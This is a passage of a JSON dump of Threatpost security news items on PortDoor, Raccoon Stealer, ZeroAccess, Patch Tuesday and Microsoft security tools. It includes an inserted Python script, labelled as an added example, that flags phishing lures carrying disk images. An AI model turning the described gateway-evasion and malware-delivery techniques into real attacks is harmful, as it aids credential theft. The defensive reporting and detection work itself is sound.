However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, PortDoor doesn\u2019t share significant code similarities with previously known malware used by those groups, leading Cybereason to conclude that it is not a variant of known malware; code overlap is therefore of little use for attribution here.\n\n\u201cLastly, we are also aware that there could be other groups, known or yet unknown, that could be behind the attack and the development of the PortDoor backdoor,\u201d researchers concluded. \u201cWe hope that as time goes by, and with more evidence gathered, the attribution could be more concrete.\u201d\n
", "cvss3": {}, "published": "2021-04-30T19:32:34", "type": "threatpost", "title": "PortDoor Espionage Malware Takes Aim at Russian Defense Sector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-04-30T19:32:34", "id": "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "href": "https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-09T11:33:23", "description": "Criminals behind malware dubbed Raccoon Stealer have adopted a simple and effective technique to circumvent Microsoft and Symantec anti-spam messaging gateways. The technique has been used in a recent campaign targeting financial institutions with lures styled on business email compromise (BEC) scams.\n\nAccording to a [Cofense report posted Thursday](<https://cofense.com/raccoon-stealer-found-rummaging-past-symantec-microsoft-gateways/>), the malware is delivered inside an .IMG disk-image file hosted on an attacker-controlled Dropbox account, so the message itself carries a link to a reputable file-sharing service rather than an executable attachment.\n\n\u201cUsing the familiar theme of a wire transfer\u2014closely akin to those often seen in business email compromise scams\u2014the threat actors look to trick users into opening the Dropbox URL and downloading the malicious file,\u201d wrote Cofense authors Max Gannon and Alan Rainer.\n\nWhat makes the Raccoon Stealer interesting to researchers is that it is new, easy-to-use and under active development by the hackers behind it. 
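A gateway-side triage check for the delivery pattern described above, as an added example: it is not Cofense's detection logic, and nothing in it is taken from the campaign beyond the wire-transfer theme, the Dropbox link and the .IMG container. The message, the URL and the image bytes are constructed. The check assumes the .IMG is an ISO 9660 image, which is what Windows 8 and later mount on double-click, and therefore looks for the standard CD001 volume descriptor in the content rather than trusting the file extension.

```python
"""
Triage for wire-transfer lures that link to a disk image on a file-sharing
host, as in the Raccoon Stealer campaign above.  Added example, not Cofense's
detection logic.  The message, URL and image bytes are constructed here; the
ISO 9660 layout (primary volume descriptor at byte 0x8000, "CD001" at offset
1 of that sector) is the standard's, and the assumption that such .IMG lures
are ISO 9660 images belongs to this example, not to the article.
"""
import re

FILE_SHARING_HOSTS = ("dropbox.com", "dropboxusercontent.com",
                      "drive.google.com", "wetransfer.com", "onedrive.live.com")
LURE_TERMS = ("wire transfer", "remittance", "swift copy", "payment advice")

ISO_PVD_OFFSET = 0x8000        # 16 system-area sectors of 2048 bytes
ISO_MAGIC = b"CD001"           # standard identifier, bytes 1..5 of the descriptor
IMAGE_EXTENSIONS = (".img", ".iso")


def is_iso9660(data: bytes) -> bool:
    """Content check: true if the blob carries an ISO 9660 volume descriptor.
    Checking bytes rather than the extension catches renamed files."""
    return data[ISO_PVD_OFFSET + 1:ISO_PVD_OFFSET + 6] == ISO_MAGIC


def file_sharing_urls(body: str) -> list[str]:
    """URLs in the body that point at a known file-sharing host."""
    urls = re.findall(r"https?://[^\s<>]+", body)
    return [u for u in urls if any(h in u.lower() for h in FILE_SHARING_HOSTS)]


def is_direct_download(url: str) -> bool:
    """Share links that hand the browser a file rather than a preview page:
    a disk-image filename in the path, or Dropbox's dl=1 parameter."""
    return bool(re.search(r"\.(?:img|iso)(?:\?|$)", url, re.IGNORECASE)) or "dl=1" in url


def triage(subject: str, body: str, attachments: dict[str, bytes]) -> list[str]:
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    text = f"{subject}\n{body}".lower()
    lure = any(term in text for term in LURE_TERMS)
    links = file_sharing_urls(body)
    if lure and links:
        findings.append(f"wire-transfer lure with file-sharing link: {links[0]}")
    for url in links:
        if is_direct_download(url):
            findings.append(f"direct-download link: {url}")
    for name, data in attachments.items():
        if is_iso9660(data):
            findings.append(f"disk-image attachment (ISO 9660 by content): {name}")
        elif name.lower().endswith(IMAGE_EXTENSIONS):
            findings.append(f"disk-image extension without ISO 9660 descriptor: {name}")
    return findings


def make_iso_stub(volume_id: bytes = b"WIRE_TRANSFER") -> bytes:
    """Constructed minimal image: a primary volume descriptor and nothing else,
    enough to exercise the content check (a real lure image carries files)."""
    buf = bytearray(ISO_PVD_OFFSET + 2048)
    pvd = ISO_PVD_OFFSET
    buf[pvd] = 1                                           # type 1: primary volume descriptor
    buf[pvd + 1:pvd + 6] = ISO_MAGIC
    buf[pvd + 6] = 1                                       # descriptor version
    buf[pvd + 40:pvd + 40 + len(volume_id)] = volume_id    # volume identifier field
    return bytes(buf)


# Constructed message in the style the article describes.
SAMPLE_SUBJECT = "Wire transfer confirmation - ref 4471"
SAMPLE_BODY = ("Please review the attached remittance advice.\n"
               "Download: https://www.dropbox.com/s/exampleid/Wire_Transfer_Advice.img?dl=1\n")
SAMPLE_ATTACHMENTS = {"Wire_Transfer_Advice.img": make_iso_stub()}

if __name__ == "__main__":
    for finding in triage(SAMPLE_SUBJECT, SAMPLE_BODY, SAMPLE_ATTACHMENTS):
        print(finding)
```

Because the image is identified by content, renaming the file or shipping it as .iso changes nothing, and because the link is flagged on host and direct-download form, the gateway can raise the alert without fetching anything from Dropbox.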
Cofense said the malware was first spotted in April of 2019 and since then has been leveraged in several different campaigns.\n\nThe malware is sold on underground forums in both Russian and English and includes around-the-clock customer support, Cofense said.\n\nAccording to research published in October by Cybereason, the malware has infected hundreds of thousands of Windows systems since April. Researchers there said the developers behind Raccoon Stealer charge $200 per month for its use.\n\n\u201cIn this most recent campaign, a potentially compromised email account was used to send the email,\u201d researchers at Cofense wrote. Those messages made it past Symantec Email Security and Microsoft Exchange Online Protection (EOP) gateways \u201cwithout the URL being removed or tampered with to the extent that it would prevent victims from clicking on it and downloading the payload.\u201d\n\nBecause of its flexibility to deliver a variety of payloads, Raccoon Stealer is gaining traction in underground markets, researchers said.\n\n**Tricky Raccoons**\n\nIn previous campaigns, Cofense researchers said, Raccoon Stealer was hidden inside RTF document attachments and targeted the utilities sector. In those campaigns, the adversaries attempted to exploit a known Microsoft Office remote code execution vulnerability ([CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>)) that dates back to 2017.\n\n\u201cAlthough not particularly advanced or subtle with its network activity and processes, the malware can quickly gather and exfiltrate data as well as download additional payloads,\u201d researchers wrote.\n\nRaccoon Stealer has also been leveraged by the attackers behind the Fallout exploit kit. 
[Over the summer](<https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf>), researchers at Bitdefender observed malicious online ads being used to deliver Raccoon Stealer to vulnerable systems. Exfiltrated from those endpoints were login credentials, auto-fill information and cookies from the Google Chrome and Mozilla browsers. Also stolen were credentials for various cryptocurrency wallets.\n\n\u201cGiven the variety of delivery options, Raccoon Stealer could be a problem for organizations that focus too much on one infection vector,\u201d Cofense researchers said.\n
", "cvss3": {}, "published": "2019-11-22T13:32:10", "type": "threatpost", "title": "Raccoon Stealer Malware Scurries Past Microsoft Messaging Gateways", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2019-11-22T13:32:10", "id": "THREATPOST:C0A58646680EABD23F9ABE6CC20F9F2E", "href": "https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:09:45", "description": "Dennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>), the book by Dan Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": 
"THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:26", "description": "Microsoft has announced plans to give away free versions of its COFEE (Computer Online Forensic Evidence Extractor) utility to help law enforcement agencies in cyber-crime investigations. \n\nCOFEE uses digital forensic technologies to help investigators gather evidence of live computer activity at the scene of a crime, regardless of technical expertise. \n \nLaw enforcement agents with less than 10 minutes training can capture live evidence of illegal activity by inserting the COFEE USB device into a computer. \n\nThe evidence is then preserved for analysis, protecting it from being destroyed when the computer is turned off for moving. \n\nMicrosoft explains:\n\n> A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Live evidence, such as some active system processes and network data, is volatile and may be lost while a computer is turning off. This evidence may contain information that could assist in the investigation and prosecution of a crime. With COFEE, a front-line officer doesn\u2019t have to be a computer expert to capture this volatile information before turning off the computer on the scene for later analysis. An officer with minimal computer experience can be tutored to use a pre-configured COFEE device in less than 10 minutes. 
This enables him or her to take advantage of common digital forensics tools the experts use to gather important volatile evidence while doing little more than simply inserting a USB device into the computer.\n\n[Read the full announcement](<http://www.microsoft.com/presspass/press/2009/oct09/10-13cofeepr.mspx>) [microsoft.com] \n", "cvss3": {}, "published": "2009-10-19T18:59:24", "type": "threatpost", "title": "Free COFEE Helps Law Enforcement Forensics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:24:46", "id": "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "href": "https://threatpost.com/free-cofee-helps-law-enforcement-forensics-101909/72343/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:33", "description": "Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 \u2013 a solid \u201cF\u201d \u2013 according to a new study by Microsoft. \n\nThe study, sponsored by [Microsoft\u2019s Trustworthy Computing Group](<http://www.microsoft.com/about/twc/en/us/default.aspx>) (TwC), introduces a new metric, the [Microsoft Computing Safety Index](<http://www.microsoft.com/security/resources/mcsi.aspx>) (MCSI) to measure online safety, but finds that consumers are having trouble getting past the basics when it comes to staying safe on the Internet.\n\nThe MCSI assigns a point value to a series of steps (more than 20 in all) that consumers can take to protect themselves online. Each point in turn is assigned to a tier of activity: Foundational (30 points), Technical (40 points) and Behavioral (30 points).\n\nActions like keeping strong passwords and choosing reputable Web sites fall under the Behavioral tier. Using a firewall, maintaining anti-virus software and running regular updates falls under the Foundational tier. 
The more steps you take, the higher your MCSI score, with 100 being the highest score possible.\n\nMicrosoft polled consumers in U.S., U.K., Germany, France and Brazil in what the company called a \u2018benchmark survey.\u2019 The average MCSI from that poll, 34, suggests users have the basics covered but have left lots of room to improve, Microsoft said.\n\nAmong the five countries, 55 percent of users use automatic computer updates and roughly 90 percent of those surveyed use anti-virus protection. Conversely, only 26 percent of users said they had confidence in their PC security software while only eleven percent agreed \u201cgood digital citizens\u201d are winning the war against hackers.\n\nThe metric was developed in conjunction with the upcoming 10-year anniversary of the [Trustworthy Computing Group](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>) next year and was released as October, [National Cyber Security Awareness Month](<https://threatpost.com/president-obama-national-cybersecurity-awareness-month-101909/>), winds down.\n", "cvss3": {}, "published": "2011-10-27T21:22:26", "type": "threatpost", "title": "Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:29", "id": "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "href": "https://threatpost.com/microsoft-invents-new-way-measure-online-safety-and-finds-consumers-stink-it-102711/75813/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Microsoft earlier this week published [a 25-page framework](<http://blogs.microsoft.com/cybertrust/2015/01/27/putting-information-sharing-into-context/>) offering guidance on how to effectively share information and what kinds of information need to be shared in 
order to reduce overall risk.\n\n[Information sharing](<http://threatpost.com/information-sharing-on-threats-seen-as-a-key-for-auto-makers/108185>) has been an oft-repeated refrain in security and policy-making circles for the better part of the last decade. There have been [draft bills](<http://threatpost.com/senate-draft-bill-to-protect-threat-information-sharing/105769>), [sharing platforms](<http://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798>) and every kind of [appeal](<http://threatpost.com/nsas-alexander-appeals-for-threat-information-sharing/102404>), [encouragement](<http://threatpost.com/regulator-warns-banks-about-ddos-attacks-encourages-information-sharing-122712/77349>) and assurance; yet there have also been quiet mutterings that organizations simply do not want to share information for a variety of reasons, not limited to competition concerns and personal embarrassment. In theory, sharing information and building a sort of defensive cooperative seems simple enough. However, the reality is that we are still talking about threat information sharing like it isn\u2019t happening despite the fact that it\u2019s a perpetual topic of discussion at nearly every corporate and government security conference.\n\nMicrosoft\u2019s framework seeks to define all the parties that need to be involved in any comprehensive information sharing exchange as well as the types of information that those groups need to be sharing. In addition to knowing with whom to share what information, Microsoft\u2019s document offers insight into designing methods, mechanisms and models for data sharing exchanges.\n\nBroadly speaking, Microsoft advises that organizations develop an overarching strategy for information sharing and collaboration with built-in privacy protections and well-established governance processes. Sharing, they say, should focus on actionable threat, vulnerability and mitigation information. 
Organizations need to build relationships in order to enable voluntary, trust-based information sharing, whereas mandatory sharing should remain limited. Once information is being shared, companies must ensure they are using that information to its full potential. Beyond these, Microsoft says there needs to be a voluntary, global exchange of emerging best practices.\n\nPerhaps not quite as broadly as best practices, Microsoft is encouraging information-sharing exchanges of varying degrees of openness to discuss successful attacks, including the information lost, techniques used, intent, and impact. They should also trade information about potential future threats and exploitable vulnerabilities and ways of mitigating bugs ahead of patch releases. Executive-level situational awareness, which could allow organizations to respond more quickly to attacks, as well as strategic analysis of the threats faced and the information sought by attackers, should be shared too.\n\nMicrosoft says there are basically six categories of participants to include in exchanges: governments, private critical infrastructure firms, enterprises, information technology, security companies and security researchers.\n\nMicrosoft encourages efforts by policymakers to construct legislation that would encourage information sharing. However, trust between those incorporated into information sharing exchanges, the company says, is critically important.\n\n\u201cLaws can compel incident reporting,\u201d Microsoft notes, \u201cbut they do not increase trust or collaboration nor do they reduce risks.\u201d\n\nExchange models can be voluntary or mandatory, though Microsoft explains that the former is the richer model. Microsoft favors voluntary sharing models because they serve to increase the level of trust between partners. 
On the other hand, mandatory models could shift the focus from smart collaborative defense to companies merely reporting threat-related information for the sake of reporting it because they are required to do so.\n\nIn terms of exchange methodology, organizations and groups thereof need to consider the level of formality of their network. Formal exchanges are generally based on contractual or non-disclosure agreements while less formal, ad hoc exchanges are generally event-specific. Subsets of formalized exchanges will be necessarily based on security clearance levels while less formalized groups of like-minded organizations can share information with one another based entirely on trust within the group.\n\n\u201cHigh-quality strategic information can help to project where the next classes of cyber-threats may come from and to identify the incentives that could motivate future attackers, along with the technologies they may target,\u201d Microsoft says. \u201cAdditionally, strategic analysis can help put incidents into a broader context and can drive internal changes, enhancing the ability of any public or private organization to update risk management practices that reduce its exposure to risk.\u201d\n\nInformation sharing, Microsoft\u2019s Cristin Goodwin and J. Paul Nicholas explain, is not merely a human-to-human exercise but must also be automated between machines to some degree.\n\n\u201cAmong security professionals, there is currently a lot of focus on developing systems that automate the exchange of information,\u201d Microsoft wrote. 
\u201cIt is believed that such systems enable actors not only to identify information important to them more quickly, but also to automate mitigations to threats as they occur.\u201d\n", "cvss3": {}, "published": "2015-01-29T13:58:34", "type": "threatpost", "title": "Microsoft Publishes Information Sharing Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:30", "id": "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "href": "https://threatpost.com/microsoft-publishes-information-sharing-guidelines/110740/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:03", "description": "Since the beginning of recorded time, security researchers, software vendors and hackers have been issuing security advisories in all kinds of nutty formats. Some feature excellent ASCII art, some have clever inside jokes and some come from Microsoft. Now, there\u2019s an effort underway, called the Common Vulnerability Reporting Framework, to standardize the way that vulnerabilities are reported so that they\u2019re in a common, machine-readable format. \n\nThe [CVRF](<http://www.icasi.org/cvrf>) is the product of a group called the Industry Consortium for Advancement of Security on the Internet (ICASI), and Microsoft in May for the first time produced its monthly Patch Tuesday advisories in the CVRF format. The company said that while the CVRF itself is still in its initial stages and will continue to evolve, the current version should give enterprise customers a good option for automating bulletin deployment. \n\n\u201cFor many customers, a machine-readable markup framework for security releases might not be a pressing need. For instance, home-computer users or small businesses may choose to install security updates automatically. 
However, many business customers spend time \u201ccopying and pasting\u201d our security bulletin content into their risk management systems, spreadsheets and corporate notification emails manually as part of their IT security compliance and remediation task list,\u201d [Microsoft\u2019s Mike Reavey](<http://blogs.technet.com/b/msrc/archive/2012/05/17/microsoft-security-updates-and-the-common-vulnerability-reporting-framework.aspx>) said in a blog post on CVRF.\n\n\u201cFor these customers, this machine-readable format may enable more efficiency and automation. Faster and more efficient guidance for these customers means they can more quickly ensure protection, which is always our goal. For those that do not require automation, we will continue to offer our bulletins in the current format.\u201d\n\nICASI members include IBM, Cisco, Juniper, Nokia and Amazon, among other companies. The current version of CVRF is 1.1, the second iteration, and the framework will continue to change as users provide feedback and requirements evolve.\n\n\u201cCVRF was created to fill a major gap in vulnerability standardization: the lack of a standard framework for the creation of vulnerability report documentation. 
Although the computer security community had made significant progress in several other areas, including categorizing and ranking the severity of vulnerabilities in information systems with the widespread adoption of the Common Vulnerabilities and Exposures (CVE) dictionary and the Common Vulnerability Scoring System (CVSS), this lack of standardization was evident in every vulnerability report, best practice document, or security bulletin released by any vendor or coordinator,\u201d the CVRF documentation says.\n", "cvss3": {}, "published": "2012-05-18T17:52:11", "type": "threatpost", "title": "Microsoft Adopts CVRF Format for Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:A21BD1B60411A9861212745052E23AE7", "href": "https://threatpost.com/microsoft-adopts-cvrf-format-security-bulletins-051812/76582/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "As expected, Microsoft delivered a patch today for a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) that was disclosed by HP\u2019s Zero Day Initiative three weeks ago, six months after it was reported to the ZDI.\n\nThe IE8 patch, [MS14-035](<https://technet.microsoft.com/library/security/ms14-035>), is included in a cumulative Internet Explorer rollup that patches 59 flaws in the browser. Most of them are remote-code execution bugs rolling all the way back to IE 6 running on Windows Server 2003 SP2.\n\nThe zero day affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. 
Microsoft said in May that it was aware of the issue.\n\n\u201cAlthough no attacks have been detected in the wild, the ZDI advisory has given attackers a head start understanding this vulnerability, possibly reducing the time required for researchers to reverse engineer the fix and devise exploit code,\u201d said Craig Young, a security researcher with Tripwire.\n\nSeven bulletins were released today: the IE rollup, one other rated critical, and five rated important.\n\nExperts are urging IT administrators to take a close look at a bulletin for Microsoft Word, [MS14-034](<https://technet.microsoft.com/library/security/ms14-034>), which, while rated important by Microsoft, should be the next highest patching priority behind IE.\n\nThe bug affects Microsoft Word 2007; users could be exposed to remote code execution if a malicious Word document is opened on a vulnerable computer.\n\n\u201cMicrosoft rates it only \u2018important\u2019 because user interaction is required\u2014one has to open a Word file\u2014but it allows the attacker Remote Code Execution. In addition, attackers have become quite skilled at tricking users into opening files,\u201d said Qualys CTO Wolfgang Kandek. \u201cWho wouldn\u2019t open a document that brings new information about the company\u2019s retirement plan? The Word vulnerability is in the newer DOCX file format and only applies to the 2007 release. If you are using the newer versions of Office/Word 2010 or 2013 you are not affected.\u201d\n\nThe second critical bulletin, [MS14-036](<https://technet.microsoft.com/library/security/ms14-036>), patches remote code execution bugs in Microsoft graphics components used by Windows, Office and Lync that could be exploited by users visiting malicious webpages or opening a malicious Office file.\n\n\u201cGraphics parsing requires complex logic and has frequently been associated with attack vectors,\u201d said Kandek. 
\u201cIt affects Windows, Office and the Lync IM client because they all bring their own copy.\u201d\n\nThis month brings 2014\u2019s total number of bulletins issued by Microsoft to 36, well below last year\u2019s pace of 46 through June.\n\n\u201cWe have become accustomed to seeing around 100 security bulletins for Microsoft products a year, but it looks as if we are in for fewer this year. This runs counter to the general tendency of the year which has already seen its share of big breaches, 0-days and the big Heartbleed vulnerability in OpenSSL,\u201d Kandek said. \u201cMaybe the reduced count is based on the increased presence of vulnerability brokers that buy up vulnerabilities for internal use? We will see how the second part of the year develops.\u201d\n\nThe remaining bulletins are rated important and include a pair of information disclosure bugs, one denial of service flaw and a tampering vulnerability.\n\n * [MS14-033](<https://technet.microsoft.com/library/security/ms14-033>) addresses an information disclosure vulnerability in Microsoft XML Core Services; an exploit on a website designed to invoke XML Core Services through IE could leak data to an attacker.\n * [MS14-032](<https://technet.microsoft.com/library/security/ms14-032>) also patches an information disclosure bug in Microsoft Lync Server. A user tricked into joining a Lync meeting by clicking on a malicious meeting URL could be exploited.\n * [MS14-031](<https://technet.microsoft.com/library/security/ms14-031>) fixes a denial-of-service bug in Windows\u2019 TCP implementation. An attacker sending a malicious sequence of packets to the target system could cause it to crash.\n * [MS14-030](<https://technet.microsoft.com/library/security/ms14-030>) patches a vulnerability in Remote Desktop that could allow tampering, Microsoft said. 
If an attacker has man-in-the-middle access to the same network segment as the targeted system during an RDP session and sends malicious RDP packets, they could exploit the vulnerability.\n\n**Adobe Patches Flash Player**\n\nAdobe released a new version of Flash Player that addresses a [critical vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-16.html>) in the software.\n\nFlash 13.0.0.214 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.359 and earlier versions for Linux are affected.\n\nAdobe said there are no active exploits against these vulnerabilities.\n", "cvss3": {}, "published": "2014-06-10T14:09:16", "type": "threatpost", "title": "June 2014 Microsoft Patch Tuesday security updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-13T15:41:16", "id": "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "href": "https://threatpost.com/microsoft-patches-ie8-zero-day-critical-word-bug/106572/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Long thought dead, the peer-to-peer (P2P) ZeroAccess botnet has resurfaced, and as of just a few weeks ago, has returned to propagating click-fraud scams.\n\nResearchers with Dell\u2019s SecureWorks [revealed Wednesday](<http://www.secureworks.com/resources/blog/zeroaccess-botnet-resumes-click-fraud-activity-after-six-month-break/>) that they witnessed the botnet restart itself from March 21 to July 2, 2014 and that halfway through this month \u2013 six months after it was last seen \u2013 the botnet has apparently gone back to its old ways and is again doling out click-fraud templates.\n\nClick-fraud, one of the easier techniques cybercriminals use to monetize malware, is essentially the embezzling of ad revenue from clicks that don\u2019t come from legitimate customers.\n\nDespite the botnet\u2019s resurfacing, researchers 
insist it hasn\u2019t grown or even tried to incorporate new compromises. Instead the botnet, which has split into two smaller botnets that use different UDP ports, is built around hosts from past infections.\n\nResearchers mapped ZeroAccess as two smaller botnets, one of 32-bit (blue) and one of 64-bit (gray) compromised Windows systems.\n\n\u201cCompromised systems act as nodes in the P2P network, and they periodically receive new templates that include URLs for attacker-controlled template servers,\u201d the firm\u2019s Counter Threat Unit (CTU) wrote.\n\nOnce the URLs are visited, like a chain reaction, the bots are redirected to their final destination.\n\nThe unit claims it counted 55,000-plus different IP addresses \u2013 mostly in Japan, India and Russia \u2013 engaging with the botnet from Jan. 17 to Jan. 25. Some may consider 55K small potatoes compared to the botnet\u2019s heyday, when Microsoft cleaned half a million machines of the malware from Feb. to March 2013, but Dell is stressing that for all intents and purposes ZeroAccess should still be considered substantial.\n\nThe CTU added that while ZeroAccess may not be able to do what other flashy botnets can, like carry out banking fraud or hold users\u2019 files ransom, it can still wreak havoc on advertisers and the machines it infects alike.\n\nIt was thought the [botnet was dead](<http://threatpost.com/microsoft-zeroaccess-botnet-has-been-abandoned/103273>) in December 2013 after Microsoft, along with Europol\u2019s European Cybercrime Centre (EC3), the F.B.I., and the firm A10 [disrupted ZeroAccess\u2019s](<http://threatpost.com/microsoft-and-friends-take-down-zeroaccess-botnet/103122>) some two million machines. Click-fraud is just one of the botnet\u2019s favorite pastimes. 
ZeroAccess, a/k/a Sirefef, has also been seen hijacking search results and redirecting victims to malicious, information stealing websites and for a short stint the platform was even spotted [facilitating Bitcoin mining](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/77168>).\n\n[Microsoft greatly curbed](<http://threatpost.com/microsofts-curbs-click-fraud-in-zeroaccess-fight/100717>) the botnet\u2019s click-fraud tendencies in May 2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:20", "description": "[](<https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/>)LAS VEGAS \u2014 Microsoft today released a new tool to help IT administrators backport anti-exploit mitigations like ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention) to older versions of Windows.\n\nThe tool, called Enhanced Mitigation Experience Toolkit (EMET) works by applying security mitigation technologies to arbitrary applications to block against exploitation through common attack vectors.\n\nIn addition to implementing ASLR and DEP on older versions of the Windows operating system, Microsoft said EMET will also add anti-exploit mitigations to existing third-party software that does not currently opt in to the mitigations.\n\n\u201cThis helps to protect against successful exploitation of vulnerabilities 
without available fixes,\u201d says Mike Reavey, a director in Microsoft\u2019s Security Response Center (MSRC). \n\nASLR and DEP, which serve as defense-in-depth roadblocks during malware attacks, are enabled by default in newer versions of Windows.\n", "cvss3": {}, "published": "2010-07-28T18:54:55", "type": "threatpost", "title": "Microsoft Ships Anti-Exploit Tool for IT Admins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:19:37", "id": "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "href": "https://threatpost.com/microsoft-ships-anti-exploit-tool-it-admins-072810/74268/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "Microsoft\u2019s research unit is investing resources in a new Web browser that could eventually signal a shift away from the ubiquitous Internet Explorer.\n\nAccording to a research paper released this week, the project is called Gazelle and is positioned as a secure web browser constructed as a multi-principal operating system.\n\nFrom [the research paper](<http://research.microsoft.com/pubs/79655/gazelle.pdf>) (.pdf):\n\nGazelle\u2019s Browser Kernel is an operating system that exclusively manages resource protection and sharing across web site principals. This construction exposes intricate design issues that no previous work has identified, such as legacy protection of cross-origin script source, and cross-principal, cross-process display and events protection. 
